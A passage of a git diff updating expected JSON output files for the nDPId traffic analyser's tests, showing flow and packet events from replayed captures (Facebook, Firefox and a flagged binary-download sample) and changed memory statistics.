{"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}} +00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","packets-captured":534,"packets-processed":534,"total-skipped-flows":0,"total-l4-payload-len":500597,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1569434972556} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 534/534 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5885027 bytes -~~ total memory freed........: 5885027 bytes -~~ total allocations/frees...: 118653/118653 +~~ total memory allocated....: 6018661 bytes +~~ total memory freed........: 6018661 bytes +~~ total allocations/frees...: 121415/121415 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 1042 chars diff --git a/test/results/facebook.pcap.out b/test/results/facebook.pcap.out index 75bb18e77..8c1be5900 100644 --- a/test/results/facebook.pcap.out +++ b/test/results/facebook.pcap.out @@ -4,17 +4,17 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1472393122365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122365,"pkt":"mAyC0zx8MFLLbJwbCABFAAA84M9AAEAGjxHAqCsSQtycRMtiAbv14btyAAAAAKACchDLCQAAAgQFtAQCCAoAS1u9AAAAAAEDAwc="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1472393122668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122668,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAE0GYuFC3JxEwKgrEgG7y2LsHfNy9eG7c6ASNpzIhwAAAgQFeAQCCAq7uwhkAEtbvQEDAwg="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1472393122668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393122668,"pkt":"mAyC0zx8MFLLbJwbCABFAAA04NBAAEAGjxjAqCsSQtycRMtiAbv14btz7B3zc4AQAOXLAQAAAQEICgBLXBi7uwhk"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} -00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} -01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} +00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} +01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393123550,"flow_last_seen":1472393123550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393123550,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1472393123550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123550,"pkt":"mAyC0zx8MFLLbJwbCABFAAA8dR1AAEAGZLPAqCsSHw1WJK5GAbsvASg9AAAAAKACchBhGgAAAgQFtAQCCAoAS10gAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1472393123682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123682,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAFMGxtAfDVYkwKgrEgG7rkZw6dh2LwEoPqASNpwMewAAAgQFeAQCCAolRdDWAEtdIAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1472393123682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393123682,"pkt":"mAyC0zx8MFLLbJwbCABFAAA0dR5AAEAGZLrAqCsSHw1WJK5GAbsvASg+cOnYd4AQAOVhEgAAAQEICgBLXUglRdDW"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":26519,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1472393124229} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 60/60 @@ -24,9 +24,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883564 bytes -~~ total memory freed........: 5883564 bytes -~~ total allocations/frees...: 118199/118199 +~~ total memory allocated....: 6017198 bytes +~~ total memory freed........: 6017198 bytes +~~ total allocations/frees...: 120961/120961 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 1368 chars diff --git a/test/results/firefox.pcap.out b/test/results/firefox.pcap.out index 2991461f9..b29f4ffe8 100644 --- a/test/results/firefox.pcap.out +++ b/test/results/firefox.pcap.out @@ -4,20 +4,20 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620927997754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927997754,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl5AbuZmizAAAAAALAC\/\/9OVwAAAgQFtAEDAwUBAQgKNAyUbQAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620927997781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927997781,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yXkJiZGFmZoswaAS\/oiCawAAAgQFrAQCCAo8IAcuNAyUbQEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620927997781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927997781,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl5AbuZmizBCYmRhoAQECyfcgAAAQEICjQMlIc8IAcu"} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998782,"flow_last_seen":1620927998782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620927998782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998782,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl\/AbveSGQcAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKNAyYZQAAAAAEAgAA"} 